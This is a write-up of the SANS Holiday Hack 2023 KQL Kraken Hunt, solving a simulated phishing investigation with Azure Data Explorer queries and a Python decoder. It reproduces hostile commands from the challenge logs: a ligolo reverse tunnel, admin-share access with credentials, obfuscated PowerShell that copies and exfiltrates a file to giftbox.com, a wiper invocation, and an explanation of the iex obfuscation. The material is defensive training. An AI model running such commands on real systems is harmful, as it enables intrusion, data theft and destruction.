
KQL Kraken Hunt⚓︎

Direct link: https://detective.kusto.io/sans2023

Objective⚓︎

Request

Use Azure Data Explorer to uncover misdeeds in Santa's IT enterprise. Go to Film Noir Island and talk to Tangle Coalbox for more information.

Tangle Coalbox

Greetings, rookie. Tangle Coalbox of Kusto Detective Agency here.
I've got a network infection case on Film Noir Island that needs your expertise.
Seems like someone clicked a phishing link within a client's organization, and trouble's brewing.
I'm swamped with cases, so I need an extra pair of hands. You up for the challenge?
You'll be utilizing the Azure Data Explorer and those KQL skills of yours to investigate this incident.
Before you start, you'll need to create a free cluster.
Keep your eyes peeled for suspicious activity, IP addresses, and patterns that'll help us crack this case wide open.
Remember, kid, time is of the essence. The sooner we can resolve this issue, the better.
If you run into any problems, just give me a holler, I've got your back.
Good hunting, and let's bring this cyber criminal to justice.
Once you've got the intel we need, report back and we'll plan our next move. Stay sharp, rookie.

Hints⚓︎

Outbound Connections

From: Tangle Coalbox

Do you need to find something that happened via a process? Pay attention to the ProcessEvents table!

KQL Tutorial

From: Tangle Coalbox

Once you get into the Kusto trainer, click the blue Train me for the case button to get familiar with KQL.

File Creation

From: Tangle Coalbox

Looking for a file that was created on a victim system? Don't forget the FileCreationEvents table.

Solution⚓︎

We set up a free Kusto cluster on dataexplorer.azure.com. The challenge provides the data set (the Employees, Email, OutboundNetworkEvents, FileCreationEvents and ProcessEvents tables), which we load into a database on that cluster and query to solve 6 cases:

Onboarding⚓︎

How many Craftperson Elf's are working from laptops?

Query:

Employees
| where role == "Craftsperson Elf"
| where hostname has "LAPTOP"
| count

Answer: 25

Case 1: Welcome to Operation Giftwrap: Defending the Geese Island network⚓︎

Intro text

An urgent alert has just come in, 'A user clicked through to a potentially malicious URL involving one user.' This message hints at a possible security incident, leaving us with critical questions about the user's intentions, the nature of the threat, and the potential risks to Santa's operations. Your mission is to lead our security operations team, investigate the incident, uncover the motives behind email, assess the potential threats, and safeguard the operations from the looming cyber threat.

The clock is ticking, and the stakes are high - are you up for this exhilarating challenge? Your skills will be put to the test, and the future of Geese Island's digital security hangs in the balance. Good luck!

The alert says the user clicked the malicious link 'http://madelvesnorthpole.org/published/search/MonthlyInvoiceForReindeerFood.docx'

What is the email address of the employee who received this phishing email?

Query:

Email
| where link == "http://madelvesnorthpole.org/published/search/MonthlyInvoiceForReindeerFood.docx"

"timestamp": 2023-12-02T09:37:40Z,
"sender": cwombley@gmail.com,
"reply_to": cwombley@gmail.com,
"recipient": alabaster_snowball@santaworkshopgeeseislands.org,
"subject": [EXTERNAL] Invoice foir reindeer food past due,
"verdict": CLEAN,
"link": http://madelvesnorthpole.org/published/search/MonthlyInvoiceForReindeerFood.docx

Answer: alabaster_snowball@santaworkshopgeeseislands.org

What is the email address that was used to send this spear phishing email?

Answer: cwombley@gmail.com

What was the subject line used in the spear phishing email?

Answer: [EXTERNAL] Invoice foir reindeer food past due

Case 2: Someone got phished! Let's dig deeper on the victim...⚓︎

Nicely done! You found evidence of the spear phishing email targeting someone in our organization. Now, we need to learn more about who the victim is! If the victim is someone important, our organization could be doomed! Hurry up, let's find out more about who was impacted!

What is the role of our victim in the organization?

Query:

Employees
| where email_addr == "alabaster_snowball@santaworkshopgeeseislands.org"
| project role,hostname, ip_addr

"role": Head Elf,
"hostname": Y1US-DESKTOP,
"ip_addr": 10.10.0.4

Answer: Head Elf

What is the hostname of the victim's machine?

Answer: Y1US-DESKTOP

What is the source IP linked to the victim?

Answer: 10.10.0.4

Case 3: That's not good. What happened next?⚓︎

Intro text

The victim is Alabaster Snowball? Oh no... that's not good at all! Can you try to find what else the attackers might have done after they sent Alabaster the phishing email? Use our various security log datasources to uncover more details about what happened to Alabaster.

What time did Alabaster click on the malicious link? Make sure to copy the exact timestamp from the logs!

Query:

OutboundNetworkEvents
| where url == "http://madelvesnorthpole.org/published/search/MonthlyInvoiceForReindeerFood.docx"
| project timestamp

Answer: 2023-12-02T10:12:42Z

What file is dropped to Alabaster's machine shortly after he downloads the malicious file?

Query:

let T0=datetime("2023-12-02T10:12:42Z");
Email 
| where link == "http://madelvesnorthpole.org/published/search/MonthlyInvoiceForReindeerFood.docx"
| join kind=inner Employees on $left.recipient==$right.email_addr
| project hostname
| join kind=inner FileCreationEvents on hostname
| where timestamp between(T0 .. 10m)
| project timestamp, filename

timestamp filename
2023-12-02T10:13:35Z MonthlyInvoiceForReindeerFood.docx
2023-12-02T10:14:21Z giftwrap.exe

Answer: giftwrap.exe

Case 4: A compromised host! Time for a deep dive.⚓︎

Intro text

Well, that's not good. It looks like Alabaster clicked on the link and downloaded a suspicious file. I don't know exactly what giftwrap.exe does, but it seems bad.

Can you take a closer look at endpoint data from Alabaster's machine? We need to figure out exactly what happened here. Word of this hack is starting to spread to the other elves, so work quickly and quietly!

The attacker created a reverse tunnel connection with the compromised machine. What IP was the connection forwarded to?

Query:

let T1=datetime("2023-12-02T10:14:21Z");
ProcessEvents
| where hostname == "Y1US-DESKTOP" and timestamp between(T1 ..300m)
| project process_commandline
  C:\Windows\system32\DllHost.exe /Processid:{45BA127D-10A8-46EA-8AB7-56EA9078943C}
  C:\Windows\Sysmon64.exe
  C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe" -f "C:\ProgramData\NVIDIA\NvContainerUser%d.log" -d 
  "ligolo" --bind 0.0.0.0:1251 --forward 127.0.0.1:3389 --to 113.37.9.17:22 --username rednose --password falalalala --no-antispoof
  "C:\Windows\System32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-2449965632-1733627164-4233550561-100134_ 
  "C:\Program Files\winlogbeat-6.0.0-windows-x86_64\\winlogbeat.exe" -c "C:\Program Files\winlogbeat-6.0.0-windows-x86_64\\winlogbeat.yml" -path.home "C:\Program Files\winlogbeat-6.0.0-windows-x86_64" -path.data "C:\\ProgramData\\winlogbeat" -path.logs "C:\\ProgramData\\winlogbeat\logs"
  C:\Windows\System32\CompPkgSrv.exe -Embedding
  netstat
  ipconfig
  "C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.190.859.0_x86__zpdnekdrzrea0\Spotify.exe" --type=crashpad-handler /prefetch:7

Answer: 113.37.9.17

The 4th result line shows ligolo, a reverse tunnelling tool, being started. The "--to" parameter names the host the tunnel is built to, 113.37.9.17 (SSH, port 22), so that is the address the connection was forwarded to; read together with "--forward 127.0.0.1:3389" and "--bind 0.0.0.0:1251", the command exposes the victim's local RDP port through that tunnel. Note that the tunnel credentials (rednose / falalalala) sit in clear text on the command line: process-creation telemetry such as ProcessEvents captures them, which is why that table is the place to look for this kind of activity.

What is the timestamp when the attackers enumerated network shares on the machine?

Query:

let T1=datetime("2023-12-02T10:14:21Z");
ProcessEvents
| where hostname == "Y1US-DESKTOP" and timestamp between(T1 ..600m)
| project timestamp, process_commandline

In the output, we find this:

  "timestamp": 2023-12-02T16:51:44Z,
  "process_commandline": net share

Answer: 2023-12-02T16:51:44Z

What was the hostname of the system the attacker moved laterally to?

Query:

let T1=datetime("2023-12-02T10:12:42.000Z");
ProcessEvents
| where username == "alsnowball" and timestamp > T1
| project timestamp, process_commandline

We encounter this:

  "timestamp": 2023-12-24T15:14:25Z,
  "process_commandline": cmd.exe /C net use \\NorthPolefileshare\c$ /user:admin AdminPass123

Answer: NorthPolefileshare

Risk of misunderstanding

I had long disregarded this as a possible answer. In my understanding, "lateral movement" involves some compromise, taking some kind of control of another system. Simply using a service that the system is meant to offer would not really fall into my (limited) category.

Case 5: A hidden message⚓︎

Intro text

Wow, you're unstoppable! Great work finding the malicious activity on Alabaster's machine. I've been looking a bit myself and... I'm stuck. The messages seem to be garbled. Do you think you can try to decode them and find out what's happening?

Look around for encoded commands. Use your skills to decode them and find the true meaning of the attacker's intent! Some of these might be extra tricky and require extra steps to fully decode! Good luck!

If you need some extra help with base64 encoding and decoding, click on the 'Train me for this case' button at the top-right of your screen.

When was the attacker's first base64 encoded PowerShell command executed on Alabaster's machine?

Query:

let T1=datetime("2023-12-02T10:12:42.000Z");
ProcessEvents
| where hostname == "Y1US-DESKTOP" and timestamp > T1
| where process_commandline contains "-enc"
| project timestamp, process_commandline

The "-enc" flag is the short form of PowerShell's "-EncodedCommand" and takes a base64-encoded command; together with "-Nop -ExecutionPolicy bypass" it is a textbook sign of scripted malicious activity. One caveat when decoding: real PowerShell expects the payload to be UTF-16LE before base64, whereas the strings in this data set decode as plain UTF-8, so a decoder should be ready for both. The query gives us 4 hits:

   "timestamp": 2023-12-15T11:20:14Z,
   "process_commandline": C:\Windows\System32\powershell.exe -Nop -ExecutionPolicy bypass -enc SW52b2tlLVdtaU1ldGhvZCAtQ29tcHV0ZXJOYW1lICRTZXJ2ZXIgLUNsYXNzIENDTV9Tb2Z0d2FyZVVwZGF0ZXNNYW5hZ2VyIC1OYW1lIEluc3RhbGxVcGRhdGVzIC0gQXJndW1lbnRMaXN0ICgsICRQZW5kaW5nVXBkYXRlTGlzdCkgLU5hbWVzcGFjZSByb290WyZjY20mXWNsaWVudHNkayB8IE91dC1OdWxs

   "timestamp": 2023-12-24T16:07:47Z,
   "process_commandline": C:\Windows\System32\powershell.exe -Nop -ExecutionPolicy bypass -enc KCAndHh0LnRzaUxlY2lOeXRoZ3VhTlxwb3Rrc2VEXDpDIHR4dC50c2lMZWNpTnl0aGd1YU5cbGFjaXRpckNub2lzc2lNXCRjXGVyYWhzZWxpZmVsb1BodHJvTlxcIG1ldEkteXBvQyBjLSBleGUubGxlaHNyZXdvcCcgLXNwbGl0ICcnIHwgJXskX1swXX0pIC1qb2luICcn

   "timestamp": 2023-12-24T16:58:43Z,
   "process_commandline": C:\Windows\System32\powershell.exe -Nop -ExecutionPolicy bypass -enc [...]

   "timestamp": 2023-12-25T10:44:27Z,
   "process_commandline": C:\Windows\System32\powershell.exe -Nop -ExecutionPolicy bypass -enc QzpcV2luZG93c1xTeXN0ZW0zMlxkb3dud2l0aHNhbnRhLmV4ZSAtLXdpcGVhbGwgXFxcXE5vcnRoUG9sZWZpbGVzaGFyZVxcYyQ=

However, the first one is benign; the decoded command reads

Invoke-WmiMethod -ComputerName $Server -Class CCM_SoftwareUpdatesManager -Name InstallUpdates - ArgumentList (, $PendingUpdateList) -Namespace root[&ccm&]clientsdk | Out-Null

This is the Configuration Manager (SCCM) client being told, through its CCM_SoftwareUpdatesManager WMI class, to install pending updates: routine administration, not something an attacker would do in this situation. The timeline agrees: it runs alone on 15 December, while the other three cluster on 24 and 25 December, after the "net use" to NorthPolefileshare at 2023-12-24T15:14:25Z.

So the answer is the timestamp of the second hit:

Answer: 2023-12-24T16:07:47Z

What was the name of the file the attacker copied from the fileshare? (This might require some additional decoding)

The second PowerShell command decodes as

  ( 'txt.tsiLeciNythguaN\potkseD\:C txt.tsiLeciNythguaN\lacitirCnoissiM\$c\erahselifeloPhtroN\\ metI-ypoC c- exe.llehsrewop' -split '' | %{$_[0]}) -join ''

The quoted string is the command written backwards; reading it from the end gives 'powershell.exe -c Copy-Item \\NorthPolefileshare\c$\MissionCritical\NaughtyNiceList.txt C:\Desktop\NaughtyNiceList.txt', a copy of the list out of the admin share that the earlier "net use" command had mapped.

Answer: NaughtyNiceList.txt

The attacker has likely exfiltrated data from the file share. What domain name was the data exfiltrated to?

The 3rd base64 string decodes to

  [StRiNg]::JoIn( '', [ChaR[]](100, 111, 119, 110, 119, 105, 116, 104, 115, 97, 110, 116, 97, 46, 101, 120, 101, 32, 45, 101, 120, 102, 105, 108, 32, 67, 58, 92, 92, 68, 101, 115, 107, 116, 111, 112, 92, 92, 78, 97, 117, 103, 104, 116, 78, 105, 99, 101, 76, 105, 115, 116, 46, 100, 111, 99, 120, 32, 92, 92, 103, 105, 102, 116, 98, 111, 120, 46, 99, 111, 109, 92, 102, 105, 108, 101))|& ((gv '*MDr*').NamE[3,11,2]-joiN

The numbers are the command as character codes, joined back into one string. The tail is a well-known obfuscation trick: (gv '*MDr*').NamE is the name of the only variable matching *MDr*, MaximumDriveCount, and indices 3, 11 and 2 of that name spell "iex", so the rebuilt string is piped into Invoke-Expression and executed.

Unwilling to install PowerShell, we use a small Python script to turn the character codes back into a string (KQL's base64_decode_tostring() would handle the outer base64 layer in-query, but not this inner one):

Decoder for ASCII Code

#!/usr/bin/python3

# Character codes copied from the [ChaR[]](...) array in the decoded command
a=[100, 111, 119, 110, 119, 105, 116, 104, 115, 97, 110, 116, 97, 46, 101, 120, 101, 32, 45, 101, 120, 102, 105, 108, 32, 67, 58, 92, 92, 68, 101, 115, 107, 116, 111, 112, 92, 92, 78, 97, 117, 103, 104, 116, 78, 105, 99, 101, 76, 105, 115, 116, 46, 100, 111, 99, 120, 32, 92, 92, 103, 105, 102, 116, 98, 111, 120, 46, 99, 111, 109, 92, 102, 105, 108, 101]

# Each number is a code point; chr() turns it back into its character
for n in a:
    print(chr(n), end='')
print()
Running it shows

  downwithsanta.exe -exfil C:\\Desktop\\NaughtNiceList.docx \\giftbox.com\file

Answer: giftbox.com

Case 6: The final step!⚓︎

Intro text

Wow! You decoded those secret messages with ease! You're a rockstar. It seems like we're getting near the end of this investigation, but we need your help with one more thing... We know that the attackers stole Santa's naughty or nice list. What else happened? Can you find the final malicious command the attacker ran?

What is the name of the executable the attackers used in the final malicious command?

We look at the decoded 4th base64 string:

  C:\Windows\System32\downwithsanta.exe --wipeall \\\\NorthPolefileshare\\c$

Answer: downwithsanta.exe

What was the command line flag used alongside this executable?

Answer: --wipeall
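The decoding in Case 5 and Case 6 was done by hand, one string at a time. As an added example (not code from the original write-up or from the challenge), the script below does the same thing over the ProcessEvents rows as a whole: it pulls the "-enc" payload out of each command line, decodes it while accepting both the UTF-16LE that real PowerShell uses and the UTF-8 this data set uses, peels the reversed-string and character-code layers, flags the Invoke-Expression alias trick, and lists UNC hosts, so the first suspicious timestamp, the copied file, the exfil domain and the wiper flag all fall out of one pass. The rows are constructed from the command lines printed above; the third row's base64 is not reproduced in the write-up, so it is rebuilt by re-encoding the decoded text shown for it. Treating the SCCM update trigger as expected administration (KNOWN_ADMIN) is an assumption of this example.

```python
#!/usr/bin/env python3
"""Peel the PowerShell -enc commands from Case 5 and Case 6 and list what they do.

Added example for this write-up, not code from the challenge or its authors.
ROWS is constructed from the ProcessEvents command lines printed above; the
third row's base64 is not reproduced in the write-up, so it is rebuilt here by
re-encoding the decoded text shown for it. Treating the SCCM update trigger as
expected administration (KNOWN_ADMIN) is an assumption of this example.
"""
import base64
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the usual ones.
ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
# ( '...' -split '' | %{$_[0]}) -join ''   the quoted literal is the command written backwards
REVERSED_RE = re.compile(r"'([^']*)'\s*-split\s*''\s*\|\s*%\{\$_\[0\]\}\s*\)\s*-join\s*''")
# [char[]](100, 111, ...)   the command spelled out as character codes
CHARCODE_RE = re.compile(r"\[char\[\]\]\s*\(([\d,\s]+)\)", re.I)
# (gv '*MDr*').Name[3,11,2]   letters 3, 11 and 2 of "MaximumDriveCount" spell "iex"
IEX_ALIAS_RE = re.compile(r"gv\s+'\*mdr\*'\)\.name\[3,\s*11,\s*2\]", re.I)
# host part of a UNC path (\\host\share); drive paths such as C:\\Desktop are skipped
UNC_HOST_RE = re.compile(r"(?<![\w:])\\\\+([\w.-]+)")
KNOWN_ADMIN = ("CCM_SoftwareUpdatesManager",)  # assumption: SCCM update trigger is benign

PS = r"C:\Windows\System32\powershell.exe -Nop -ExecutionPolicy bypass -enc "
INNER3 = ("[StRiNg]::JoIn( '', [ChaR[]](100, 111, 119, 110, 119, 105, 116, 104, 115, 97, "
          "110, 116, 97, 46, 101, 120, 101, 32, 45, 101, 120, 102, 105, 108, 32, 67, 58, 92, "
          "92, 68, 101, 115, 107, 116, 111, 112, 92, 92, 78, 97, 117, 103, 104, 116, 78, 105, "
          "99, 101, 76, 105, 115, 116, 46, 100, 111, 99, 120, 32, 92, 92, 103, 105, 102, 116, "
          "98, 111, 120, 46, 99, 111, 109, 92, 102, 105, 108, 101))|& ((gv '*MDr*').NamE[3,11,2]-joiN")
ROWS = [  # (timestamp, process_commandline), constructed from the write-up's query output
    ("2023-12-15T11:20:14Z", PS + "SW52b2tlLVdtaU1ldGhvZCAtQ29tcHV0ZXJOYW1lICRTZXJ2ZXIgLUNsYXNzIENDTV9Tb2Z0d2FyZVVwZGF0ZXNNYW5hZ2VyIC1OYW1lIEluc3RhbGxVcGRhdGVzIC0gQXJndW1lbnRMaXN0ICgsICRQZW5kaW5nVXBkYXRlTGlzdCkgLU5hbWVzcGFjZSByb290WyZjY20mXWNsaWVudHNkayB8IE91dC1OdWxs"),
    ("2023-12-24T16:07:47Z", PS + "KCAndHh0LnRzaUxlY2lOeXRoZ3VhTlxwb3Rrc2VEXDpDIHR4dC50c2lMZWNpTnl0aGd1YU5cbGFjaXRpckNub2lzc2lNXCRjXGVyYWhzZWxpZmVsb1BodHJvTlxcIG1ldEkteXBvQyBjLSBleGUubGxlaHNyZXdvcCcgLXNwbGl0ICcnIHwgJXskX1swXX0pIC1qb2luICcn"),
    ("2023-12-24T16:58:43Z", PS + base64.b64encode(INNER3.encode()).decode()),  # rebuilt row
    ("2023-12-25T10:44:27Z", PS + "QzpcV2luZG93c1xTeXN0ZW0zMlxkb3dud2l0aHNhbnRhLmV4ZSAtLXdpcGVhbGwgXFxcXE5vcnRoUG9sZWZpbGVzaGFyZVxcYyQ="),
]


def encode_enc(text: str) -> str:
    """Build a payload the way PowerShell itself expects it: UTF-16LE, then base64."""
    return base64.b64encode(text.encode("utf-16-le")).decode()


def decode_enc(b64: str) -> str:
    """UTF-16LE ASCII decodes to ASCII, while UTF-8 text read as UTF-16LE does not.
    That distinguishes real payloads from this data set's UTF-8 ones."""
    raw = base64.b64decode(b64)
    if len(raw) % 2 == 0:
        try:
            text = raw.decode("utf-16-le")
            if text.isascii():
                return text
        except UnicodeDecodeError:
            pass
    return raw.decode("utf-8", errors="replace")


def peel(cmd: str) -> tuple:
    """Strip the obfuscation layers seen in this case; return (plaintext, layers)."""
    layers, text = [], cmd
    if m := ENC_RE.search(text):
        text = decode_enc(m.group(1))
        layers.append("base64")
    if m := REVERSED_RE.search(text):
        text = m.group(1)[::-1]
        layers.append("reversed")
    if IEX_ALIAS_RE.search(text):
        layers.append("iex-alias")  # whatever is rebuilt gets piped into Invoke-Expression
    if m := CHARCODE_RE.search(text):
        text = "".join(chr(int(n)) for n in m.group(1).split(","))
        layers.append("charcodes")
    return text, layers


def triage(rows) -> list:
    """Decode every -enc row in time order; mark the ones on the admin list as benign."""
    findings = []
    for ts, cmd in sorted(rows):
        if not ENC_RE.search(cmd):
            continue
        plain, layers = peel(cmd)
        findings.append({
            "timestamp": ts,
            "layers": layers,
            "plain": plain,
            "benign": any(k in plain for k in KNOWN_ADMIN),
            "hosts": UNC_HOST_RE.findall(plain),
        })
    return findings


def first_suspicious(rows) -> str:
    """Timestamp of the earliest encoded command that is not expected administration."""
    return next(f["timestamp"] for f in triage(rows) if not f["benign"])


if __name__ == "__main__":
    for f in triage(ROWS):
        tag = "admin  " if f["benign"] else "SUSPECT"
        print(f["timestamp"], tag, "+".join(f["layers"]), f["plain"], f["hosts"])
    print("first suspicious:", first_suspicious(ROWS))
```

Run as a script it prints one decoded line per row. The "-split '' | %{$_[0]}" wrapper is treated as a marker for a reversed literal, which is how the write-up reads it; decode_enc accepts real UTF-16LE payloads as well, which matters the moment the same script is pointed at production Sysmon or EDR data rather than this challenge set.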

Congratulations!⚓︎

Intro text

Congratulations, you've cracked the Kusto detective agency section of the Holiday Hack Challenge!

By now, you've likely pieced together the broader narrative of the alert we received. It all started with Wombley Cube, a skilled Craftsperson, and a malicious insider, who sent an email to the esteemed head elf, Alabaster Snowball. This seemingly innocent email contained a dangerous link leading to the malicious domain, MadElvesNorthPole.org. Alabaster Snowball, from his PC, unwittingly clicked on the link, resulting in the download and execution of malicious payloads. Notably, you've also discerned Wombley Cube's ulterior motive: to pilfer a copy of Santa's naughty or nice list and erase the data on the share drive containing critical information to Santa's operations. Kudos to you!

To earn credit for your fantastic work, return to the Holiday Hack Challenge and enter the secret phrase which is the result of running this query:

print base64_decode_tostring('QmV3YXJlIHRoZSBDdWJlIHRoYXQgV29tYmxlcw==')

Running this in the Azure Data Explorer shows

Beware the Cube that Wombles

Images⚓︎

We even got two awards: [image: awards]

Final Answer

Beware the Cube that Wombles

Response⚓︎

Tangle Coalbox

I had my doubts, but you've proven your worth.
That phishing scheme won't trouble our client's organization anymore, thanks to your keen eye and investigatory prowess.
So long, Gumshoe, and be careful out there.